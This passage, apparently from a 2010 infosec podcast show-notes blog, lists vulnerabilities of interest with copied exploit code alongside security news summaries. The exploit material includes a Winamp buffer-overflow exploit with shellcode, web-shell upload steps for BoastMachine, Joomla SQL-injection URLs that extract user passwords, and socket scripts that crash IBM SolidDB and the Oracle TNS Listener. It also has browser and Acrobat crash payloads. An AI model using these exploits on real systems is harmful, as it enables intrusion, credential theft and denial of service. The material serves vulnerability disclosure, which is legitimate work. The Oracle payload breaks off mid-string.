# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print “n#########################################n”;
print “# Winamp 5.572 stack buffer overflow #n”;
print “# PoC by: Debug (eldadru@gmail.com) #n”;
print “# Exploit by: NeoCortex (ICQ 158005940) #n”;
print “#########################################n”;

print ” __ __________________n”;
print ” ________ / \ / / ____ / ____ /
________n”;
print ” ________ /_______/ / /\ \ / / /___/ / / / / /_______/
________ n”;
print ” /_______/ _______ / / \ \ / / /_____/ / / / ________
/_______/n”;
print ” /_______/ / / \ \/ / /_____/ /___/ /
/_______/n”;
print ” /_/ \__/_______/_______/n”;
print ” Where’s the next phone box to the matrix
please?nnn”;

my $version = “Winamp 5.572″;

my $junk = “x41″ x 540;
my $eip = “xadx86x0ex07″; # overwrite EIP – 070E86AD FFD4 CALL
ESP nde.dll
my $nop = “x90″ x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
“xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49″.
“x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47″.
“x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32″.
“x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a”.
“x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e”.
“x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54″.
“x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64″.
“x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f”.
“x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f”.
“x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d”.
“x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44″.
“x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35″.
“x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a”.
“x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b”.
“x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57″.
“x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b”.
“x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63″.
“x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59″.
“x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73″.
“x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63″.
“x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33″.
“x30x47″;

open (myfile,’>> whatsnew.txt’);
print myfile $version.$junk.$eip.$nop.$shellcode;

print “[+] whatsnew.txt written.n”;
print “[ ] Now copy it to your winamp folder…n”;
print “[ ] Run winamp and hit [About Winamp]->[Version
History]n”;

4. BoastMachine version 3.1 is subject to a remote shell upload vulnerability.
· First join in the Site /Server/path/register.php

Login in the Site/Server/path/login.php
After login, go to /Server/path/bmc/files.php?form_id=new
Now upload your shell like ( Shell.php.rar ) and you will find your shell here /Server/path/files/username_Shell.php.rar
http://sample.com/hp_boastMachine/files/username_Shell.php.rar

5. Safari version 4.0.4 is subject to a javascript crash denial of service vulnerability. The following piece of javascript will crash Safari nicely when triggered using one of the methods described below. PoC code is available:
<script>
var data = “A”;
while(data.length<0×40000){
data += data;
}
data2 = new Array();
for (x=0; x<4000; x++){
data2[x] = data+data;
}
</script>

News Items of Interest:

News item 1:http://www.benedelman.org/news/012610-1.html
Do you run Google’s Toolbar? Did you disable the transmitting to Google of the full URL of every page-view, including searches at competing search engines. Apparently, even if a users wants to disable such a transmission it’s fairly easy to turn them off, right? You might be surprised to learn that apparently disable means don’t disable when you’re using “Enhanced Features” mode.

Which by the way, the standard Google Toolbar installation encourages users to activate via a “bubble” message shown at the conclusion of installation. The bubble presents a forceful request for users to activate Sidewiki: Which is described as “enhanced” and “helpful”, and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus – so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation

News item 2: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211151
Hacker best known for cracking Apple’s iPhone says he’s done it again, this time with Sony’s PlayStation 3. In a blog post, George Hotz said that after a five-week effort, he’d finally managed to run his own software on the PlayStation 3, which typically only plays digitally signed software that is approved by Sony. “I have read/write access to the entire system memory, and [hypervisor] level access to the processor,” he wrote. “In other words, I have hacked the PS3.” He pulled off the feat using “very simple hardware, cleverly applied, and some not so simple software,” he added.

News item 3: http://news.cnet.com/8301-1009_3-10442305-83.html?part=rss&subj=news&tag=2547-1_3-0-20

The “Verified by Visa” credit-card authentication system has come under criticism from Cambridge University researchers, who say it is training online shoppers to adopt risky security habits.

The feature, which is used to authenticate online financial transactions, confuses people by not displaying security cues, security engineering researchers Ross Anderson and Steven Murdoch said in a paper (PDF) published Tuesday.

The primary purpose of 3DS is to allow a merchant to establish whether a customer controls a particular card number. It is essentially a single-sign on system, operated by Visa and MasterCard, and it diers in two main ways from existing schemes such as OpenID or InfoCard.

3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions. It was developed by Visa to improve the security of Internet payments and offered to customers as the Verified by Visa service. Services based on the protocol have also been adopted by MasterCard, under the name MasterCard SecureCode, and by JCB International as J/Secure.

3-D Secure adds another authentication step for online payments. Merchants are encouraged to use 3-D Secure to achieve higher coverage against fraud losses. When a merchant does not use 3-D Secure they are liable for fraudulent transactions even if the transaction was properly authorized. 3-D Secure should not be confused with the Card Security Code which is a short numeric code that is printed on the card.

Before 3DS can be used to authenticate transactions, cardholders must register a password with their bank. A reasonably secure method would be to send a password to the customer’s registered address, but to save money the typical bank merely solicits a password online the 1st time the customer shops online with a 3DS enabled card { known as activation during shopping (ADS).

News item 4:http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft?
A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises. In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary’s bank accounts and depleted it by $801,495. About $600,000 of the amount was later recovered by PlainsCapital. Hillary demanded that the bank repay it the rest of the stolen money. In a letter to the bank in December, Hillary claimed that the theft happened only because PlainsCapital had failed to implement adequate security measures. The bank sought to absolve itself from blame in the heist by stating that the unauthorized wire transfer orders had been placed by someone using valid Internet banking credentials belonging to Hillary Machinery. “PlainsCapital accepted the wire transfer orders in good faith,” and had therefore not breached any of its agreements with Hillary, the bank said in its complaint.

The case is also unusual because it is believed to be the first bank to launch a pre-emptive lawsuit against a customer victimized by a cyber theft. Several other cases, where companies that have been victims of such thefts have sued their banks for failing to implement reasonable security measures, are pending in courts around the country.

Hillary is still deciding its next steps, but according to its lawyer, Patrick Madden, the company will next file a response asserting that it was the bank’s failure to employ suitable security controls that resulted in the theft.
News item 5: http://www.omaha.com/article/20100126/NEWS97/701269885
Federal prosecutors in California say a Nebraska man will plead guilty to participating in a cyber attack on Church of Scientology Web sites in January 2008.

Brian Thomas Mettenbrink agreed to plead guilty Monday to the misdemeanor charge of unauthorized access of a protected computer, said Thom Mrozek, a spokesman for the U.S. attorney’s office in Los Angeles. Mettenbrink faces a year in federal prison.

Court records say Mettenbrink attacked Scientology Web sites as part of Anonymous, an underground group that protests the Church of Scientology, accusing it of Internet censorship.

Prosecutors say hackers conducted a “denial of service” attack, in which computers flood a target Web site with malicious Internet traffic, making it unavailable to legitimate users.

News item 6: http://news.techworld.com/security/3211146/researcher-reveals-another-ie-security-flaw/?olo=rss

A flaw in Microsoft’s Internet Explorer could allow a hacker to read files on a person’s computer, according to a security researcher. The claim represents another problem for the company just days after a serious vulnerability received an emergency patch. The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at Washington’s Black Hat conference on 3 February.

News item 7: http://blog.commandlinekungfu.com/

2010
01.26

Episode 54 – Meat Detonation

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast for January 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

FORENSICS 606: Drive and Data Recovery Forensics   2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth   2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems   3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression   4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth   5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=4%23&newmonth=01
http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=5%23&newmonth=01

http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=4%23

http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=5%23
IBM SolidDB is subject to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected. Exploit code is available:
#!python
import socket
import struct

#maxlen 0xA
a = struct.pack(‘<b’, 2)
a += struct.pack(‘<H’, 0)
a += struct.pack(‘<H’,0xFEFF)
a += struct.pack(‘<H’,0xFEFF)
a += “1234″

target_ip = ‘X.X.X.X’

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2315))

s.send(a)
s.close()
Google Chrome is subject to multiple vulnerabilities including multiple memory-corruption issues, multiple security-bypass issues, input-validation issues and denial-of-service issues. Attackers can exploit these issues to bypass certain security checks, execute arbitrary code in the context of the browser, and cause denial-of-service conditions; other attacks are also possible. Versions prior to Chrome 4.0.249.78 are vulnerable. Attackers can use standard tools to exploit some of the issues; other issues may require exploit code.
Adobe Reader and Acrobat are subject to a remote security-bypass vulnerability.An attacker can exploit this issue to obtain the contents of sensitive PDF files or to perform cross-site scripting attacks against domains hosting PDF files. Example PDF:
%FDF-1.2
1 0 obj
<<
/FDF
<<
/F(http://www.sample.com/any.pdf)
/JavaScript
<<
/After (app.alert(“Executing script inside Acrobat at “+URL);)
>>
>>
>>
endobj
trailer
<</Root 1 0 R>>

News Items of Interest:

News item 1:http://www.theregister.co.uk/2010/01/25/oil_companies_attacked/

At least three US oil companies were victims of highly targeted, email-borne attacks designed to siphon valuable data from their corporate networks and send it abroad, according to a published report citing unnamed people and government documents.

The attacks against Marathon Oil, ExxonMobil, and ConocoPhillips began with emails sent to senior executives that included links to booby-trapped websites, according to the report in The Christian Science Monitor. The breaches focused on the companies’ proprietary “bid data” detailing the quantity, value, and location of petroleum discoveries worldwide. The report said at least some of the attacks appeared to originate in China, but didn’t provide proof beyond the existence of servers located in that country used to store some of the stolen data.

News item 2:http://www.dailymail.co.uk/news/article-1245622/For-sale-Personal-details-millions-Ladbrokes-gamblers.html

The confidential records of millions of British gamblers who bet with top bookmaker Ladbrokes have been offered for sale to The Mail on Sunday.

The huge data theft is now at the center of a criminal investigation after this newspaper was given the personal information of 10,000 Ladbrokes customers and offered access to its database of 4.5 million people in the UK and abroad. The records include customers’ home addresses, details of their gambling history, customer account numbers, dates of birth, phone numbers and email addresses.

News item 3: http://www.lasvegassun.com/news/2010/jan/25/umc-patient-info-leaks-likely-date-back-july/
For more than three months someone at University Medical Center illegally leaked the personal information of traffic accident victims — a breach of social security numbers, birth dates and more that only stopped when the Las Vegas Sun contacted the hospital about it, according to a statement released today by UMC.

News item 4: http://news.cnet.com/8301-27080_3-10441004-245.html

People behind the China-based online attacks of Google and other companies looked up key employees on social networks and contacted them pretending to be their friends to get the workers to click on links leading to malware, according to a published report on Monday. “The most significant discovery is that the attackers had selected employees at the companies with access to proprietary data, then learnt who their friends were,” the Financial Times reported. “The hackers compromised the social network accounts of those friends, hoping to enhance the probability that their final targets would click on the links they sent.”
News item 5: http://blog.osvdb.org/2010/01/24/microsoft-aurora-and-something-about-forest-and-trees
Why do we care that Microsoft sits on vulnerabilities for six months? Why is that such a big deal? Am I the only one who missed the articles pointing out that they actually sat on five code other execution bugs for much longer?

CVE	Reported to MS	Disclosed	Time to Patch
CVE-2010-0244	2009-07-14	2010-01-21	6 Months, 7 Days (191 days)
CVE-2010-0245	2009-07-14	2010-01-21	6 Months, 7 Days (191 days)
CVE-2010-0246	2009-07-16	2010-01-21	6 Months, 5 Days (189 days)
CVE-2010-0248	2009-08-14	2010-01-21	5 Months, 7 days (160 days)
CVE-2010-0247	2009-09-03	2010-01-21	4 Months, 18 days (140 days)
CVE-2010-0249	2009-09-??	2010-01-14	4 Months, 11 days (133 days) – approx
CVE-2010-0027	2009-11-15	2010-01-21	2 Months, 6 days (67 days)
CVE-2009-4074	2009-11-20	2009-11-21	2 Months, 1 day (62 days)

News item 6: http://www.businesscomputingworld.co.uk/?p=3347

Some additional news out of CES is that Victorinox’s swiss army knife remained uncracked – and that the $100,000 prize went unclaimed. Even if someone had cracked the 2010 version of the famous Swiss Army knife, they would have obtained a lot more than $100,000 from other sources. Victorinox, the manufacturers of the Swiss Army knife, which dates back to the late 1800s in its various forms, has made much of the unit’s tamper-proof self-destruct mode, but the reality is that the crypto USB drive supports elliptical curve and AES encryption, which makes it almost impervious to crackers using current known technology.
As Schneier observed in his research, cryptography is all about safety margins. If a hacker manages to crack 128-bit AES technology, then you can bet your bottom line that Schneier would be interested, and governments would pay a lot more than $100,000 for the secret. But this clearly isn’t going to happen for some time to come, so I think Victorinox’ cash is safe for the time being.

News item 7: http://www.wired.com/threatlevel/2010/01/jilsi-pleads-guilty

A former ringleader of a top internet carding site run secretly by the FBI has pleaded guilty in the United Kingdom. Renukanth Subramaniam, aka JiLsi, was a former Pizza Hut delivery guy who helped run one of the leading English-language criminal sites, DarkMarket. The site operated as an international cyber-bazaar for more than 2,000 hackers, carders and identity thieves until it was closed in 2008.

Members of the site traded in stolen bank card and identification data. They bought and sold specialized equipment for skimming card and PIN numbers, and for cloning data to blank cards. The activities on DarkMarket are estimated to have resulted in fraud amounting to tens of millions of dollars.

News item 8:http://news.cnet.com/8301-27080_3-10439263-245.html

The California Department of Motor Vehicles department suffered a network outage on Thursday due to an equipment glitch, a state official said. A router switch malfunctioned, said Bill Maile, spokesman for Office of Technology Services for the state of California. “It’s very rare,” he said. “Our staff quickly diagnosed the problem and re-routed network traffic to restore connectivity.” The network was down for about two hours and was restored at about 1:40 p.m. PST, according to Maile. There are 168 DMV offices throughout the state, said Jan Mendoza, spokeswoman for the DMV. “We didn’t close offices,” she said. “When people came in we handled customers manually. We did it the old-fashioned way–with pen and paper.”
News item 9:http://www.eetimes.com/news/design/showArticle.jhtml?articleID=222301321
The IEEE has launched a new Web site that consolidates information about smart electric grids from it various societies. The portal is one of many activities from an IEEE smart grid initiative coordinating the organization’s work on the transition to digital, networked power systems and services.

The smart grid is “so interdisciplinary,” said Wanda Reder, chair of the IEEE Smart Grid Task Force and former president of the IEEE Power & Energy Society. “We have the gamut covered in technical interests, but we needed a way to facilitate communications between our many entities to link information on all the conferences, papers and standards we have in this area,” she added.

The Web site lists many of the estimated 100 existing IEEE standards related to smart grids. It also includes pointers to the IEEE 2030 group started last year that aims to release a draft guide to smart grid design in early 2011.
News item 10: http://news.zdnet.co.uk/security/0,1000000189,40005862,00.htm?s_cid=248use hackers are the “noisiest and easiest to detect”,
Many organizations are focused on stopping random hackers and blocking pornography when they should be concerned with bigger threats from professional cybercriminals, according to a new cybersecurity report.

In a survey conducted in 2009 of 523 IT and security managers, top-level executives and law-enforcement personnel, hackers were rated the biggest threat, followed by insiders and foreign entities — probably because hackers are the “noisiest and easiest to detect”, the 2010 CyberSecurity Watch Survey concluded.

2010
01.25

Episode 53 – Who Ownz an Exploit?

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 53 for January 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

IntelliTamper is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. This issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed exploit attempts will likely crash the application, denying service to legitimate users. IntelliTamper 2.07 and 2.08 are vulnerable; other versions may also be affected. Proof-of-concept and exploits are available:
# H0m3 : S3curity-art.com & Google.com
# M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
# usage : perl xpl.pl >>xpl.html
my $IntelliTamper_html =’<html><head><title>SkuLL-HackeR Home
World</title></head><body>’ .
‘<script defer=”‘ .
“\x41″ x 3076 .
‘”>’ .
“</body></html>”;
print $IntelliTamper_html;
PunBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PunBB 1.3 is vulnerable; other versions may also be affected. Google Dork: inurl: viewtopic.php?pid= Example URL: http://www.sample.com/forum/viewtopic.php?pid=[Xss]
The ‘com_gameserver’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/component/gameserver/?view=gameserver&grp=-1′+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%2
The ‘com_gurujibook’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL available: http://www.sample.com/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users–
The JbPublishDownFp component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
The Mochigames component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80
VMware Player is subject to an .m3u skin file local heap overflow.
# By : Pr0f.SeLLiM
VMware Player (.m3u Skin File) Local Heap Overflow PoC
########################
##EBX 41414141
##ESP 0012EF6C
##EBP 00DA50F8 ASCII “C:Program FilesVMware
Playerskinscrash.M3u”
##ESI 0012EFD8
##EDI 014143F8
##EIP 7C90EAF0 ntdll.7C90EAF0
#############################################################
my $boom=”x41″ x 5000;
my $file=”crash.dat”;
open($FILE,”>$file”);
print $FILE $boom;
close($FILE);
print “File Successfully Createdn”;
#####

News Items of Interest:

News item 1: http://news.bbc.co.uk/2/hi/americas/8478005.stm

A Chinese industry ministry spokesman told the state-run Xinhua news agency that claims that Beijing was behind recent cyber attacks were “groundless”. US Secretary of State Hillary Clinton this week asked China to investigate claims by Google that it had been targeted by China-based hackers.The US search giant has threatened to withdraw from China. “The accusation that the Chinese government participated in [any] cyber attack, either in an explicit or inexplicit way, is groundless. We [are] firmly opposed to that,” the unnamed spokesman of China’s ministry of industry and information technology told Xinhua.

News item 2: http://pajamasmedia.com/instapundit/92423/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+instapundit%2Fmain+%28Instapundit%29

“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google’s system isn’t unique. Democratic governments around the world — in Sweden, Canada and the UK, for example — are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell.”

News item 3: http://seclists.org/fulldisclosure/2010/Jan/474

From: Orn Roswell <orn.roswell () gmail com>
Date: Sun, 24 Jan 2010 23:52:27 +0100
Hello,

I am selling IE 8 remote code execution exploit (not patched by the last Microsoft fix). Working under Windows Vista & Windows 7.

Regards,

[ORN ROSWELL]

News item 4: http://www.computerworld.com/s/article/9148138/Researcher_to_reveal_more_Internet_Explorer_problems
Microsoft’s Internet Explorer (IE) could inadvertently allow a hacker to read files on a person’s computer, another problem for the company just days after a serious vulnerability received an emergency patch.

The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at the Black Hat conference in Washington, D.C., on Feb. 3.

News item 5: http://news.cnet.com/8301-13772_3-10440819-52.html?part=rss&subj=news&tag=2547-1_3-0-20

Earlier this month, as reported by AVWeb, the U.S. Federal Aviation Administration issued “special conditions” regarding Boeing’s forthcoming 747-8–the next-generation of its iconic 747 line of planes–aimed at making sure that the new plane’s high-tech networking systems are hack proof.

According to the FAA, the 747-8–which should have its first flight any day now, and which is intended to be a much more efficient and powerful version of the 747 than even its most recent models–”will have novel or unusual design features associated with the architecture and connectivity capabilities of the airplane’s computer systems and networks, which may allow access to external computer systems and networks.”

2010
01.22

Episode 52 – Mood Swing

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 52 for January 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

Oracle Database is subject to a remote memory-corruption vulnerability in Listener. The vulnerability can be exploited over the ‘Oracle Net’ protocol. An attacker does not require privileges to exploit this vulnerability. This vulnerability affects the following supported versions 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7. Proof of concept is available:
# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash

# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt
# to allocate huge memory block and copy *something* to it.

# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0×438631 (TNSLSNR.EXE!nsglvcrt+0×95))
# TID=3052|(1) MSVCR71.dll!malloc -> 0×2530020
# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0×2530020, 0, 0x4222fc4) (called from 0×438647 (TNSLSNR.EXE!nsglvcrt+0xab))

# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched)
# If I correct, nsglvcrt() function is involved in new service creation.

# Successfully crashed:
# Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied
# Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied
# Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied
# Oracle RDBMS 10.2.0.2 Linux x86
# Not crashed:
# Oracle RDBMS 11.2 Linux x86

# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>

# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0):
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 1521))

sockobj.send(
“\x00\x68\x00\x00\x01\x00\x00\x00″
“\x01\x3A\x01\x2C\x00\x00\x20\x00″
“\x7F\xFF\xC6\x0E\x00\x00\x01\x00″
“\x00\x2E\x00\x3A\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x28\x43\x4F\x4E\x4E\x45″
“\x43\x54\x5F\x44\x41\x54\x41\x3D”
“\x28\x43\x4F\x4D\x4D\x41\x4E\x44″
“\x3D\x73\x65\x72\x76\x69\x63\x65″
“\x5F\x72\x65\x67\x69\x73\x74\x65″
“\x72\x5F\x4E\x53\x47\x52\x29\x29″
)

data=sockobj.recv(102400)

sockobj.send(
“\x02\xDE\x00\x00\x06\x00\x00\x00″
“\x00\x00\x00\x00\x02\xD4\x20\x08″
“\xFF\x03\x01\x00\x12\x34\x34\x34″
“\x34\x34\x78\x10\x10\x32\x10\x32″
“\x10\x32\x10\x32\x10\x32\x54\x76″
“\x00\x78\x10\x32\x54\x76\x44\x00″
“\x00\x80\x02\x00\x00\x00\x00\x04″
“\x00\x00\x70\xE4\xA5\x09\x90\x00″
“\x23\x00\x00\x00\x42\x45\x43\x37″
“\x36\x43\x32\x43\x43\x31\x33\x36″
“\x2D\x35\x46\x39\x46\x2D\x45\x30″
“\x33\x34\x2D\x30\x30\x30\x33\x42″
“\x41\x31\x33\x37\x34\x42\x33\x03″
“\x00\x65\x00\x01\x00\x01\x00\x00″
“\x00\x00\x00\x00\x00\x00\x64\x02″
“\x00\x80\x05\x00\x00\x00\x00\x04″
“\x00\x00\x00\x00\x00\x00\x01\x00″
“\x00\x00\x10\x00\x00\x00\x02\x00″
“\x00\x00\x84\xC3\xCC\x07\x01\x00″
“\x00\x00\x84\x2F\xA6\x09\x00\x00″
“\x00\x00\x44\xA5\xA2\x09\x25\x98″
“\x18\xE9\x28\x50\x4F\x28\xBB\xAC”
“\x15\x56\x8E\x68\x1D\x6D\x05\x00″
“\x00\x00\xFC\xA9\x36\x22\x0F\x00″
“\x00\x00\x60\x30\xA6\x09\x0A\x00″
“\x00\x00\x64\x00\x00\x00\x00\x00″
“\x00\x00\xAA\x00\x00\x00\x00\x01″
“\x00\x00\x17\x00\x00\x00\x78\xC3″
“\xCC\x07\x6F\x72\x63\x6C\x00\x28″
“\x48\x4F\x53\x54\x3D\x77\x69\x6E”
“\x32\x30\x30\x33\x29\x00\x01\x00″
“\x00\x00\x58\x00\x00\x00\x01\x00″
“\x00\x00\x50\xC5\x2F\x22\x02\x00″
“\x00\x00\x34\xC5\x2F\x22\x00\x00″
“\x00\x00\x9C\xC5\xCC\x07\x6F\x72″
“\x63\x6C\x5F\x58\x50\x54\x00\x09″
“\x00\x00\x00\x50\xC5\x2F\x22\x04″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x34″
“\xC5\xCC\x07\x6F\x72\x63\x6C\x5F”
“\x58\x50\x54\x00\x01\x00\x00\x00″
“\x05\x00\x00\x00\x01\x00\x00\x00″
“\x84\xC5\x2F\x22\x02\x00\x00\x00″
“\x68\xC5\x2F\x22\x00\x00\x00\x00″
“\xA4\xA5\xA2\x09\x6F\x72\x63\x6C”
“\x00\x05\x00\x00\x00\x84\xC5\x2F”
“\x22\x04\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\xFC\xC4\xCC\x07\x6F\x72\x63″
“\x6C\x00\x01\x00\x00\x00\x10\x00″
“\x00\x00\x02\x00\x00\x00\xBC\xC3″
“\xCC\x07\x04\x00\x00\x00\xB0\x2F”
“\xA6\x09\x00\x00\x00\x00\x00\x00″
“\x00\x00\x89\xC0\xB1\xC3\x08\x1D”
“\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7″
“\x66\x6D\x0A\x00\x00\x00\x78\x2B”
“\xBC\x04\x7F\x00\x00\x00\x64\xA7″
“\xA2\x09\x0D\x00\x00\x00\x20\x2C”
“\xBC\x04\x11\x00\x00\x00\x95\x00″
“\x00\x00\x02\x20\x00\x80\x03\x00″
“\x00\x00\x98\xC5\x2F\x22\x00\x00″
“\x00\x00\x00\x00\x00\x00\x0A\x00″
“\x00\x00\xB0\xC3\xCC\x07\x44\x45″
“\x44\x49\x43\x41\x54\x45\x44\x00″
“\x28\x41\x44\x44\x52\x45\x53\x53″
“\x3D\x28\x50\x52\x4F\x54\x4F\x43″
“\x4F\x4C\x3D\x42\x45\x51\x29\x28″
“\x50\x52\x4F\x47\x52\x41\x4D\x3D”
“\x43\x3A\x5C\x61\x70\x70\x5C\x41″
“\x64\x6D\x69\x6E\x69\x73\x74\x72″
“\x61\x74\x6F\x72\x5C\x70\x72\x6F”
“\x64\x75\x63\x74\x5C\x31\x31\x2E”
“\x31\x2E\x30\x5C\x64\x62\x5F\x31″
“\x5C\x62\x69\x6E\x5C\x6F\x72\x61″
“\x63\x6C\x65\x2E\x65\x78\x65\x29″
“\x28\x41\x52\x47\x56\x30\x3D\x6F”
“\x72\x61\x63\x6C\x65\x6F\x72\x63″
“\x6C\x29\x28\x41\x52\x47\x53\x3D”
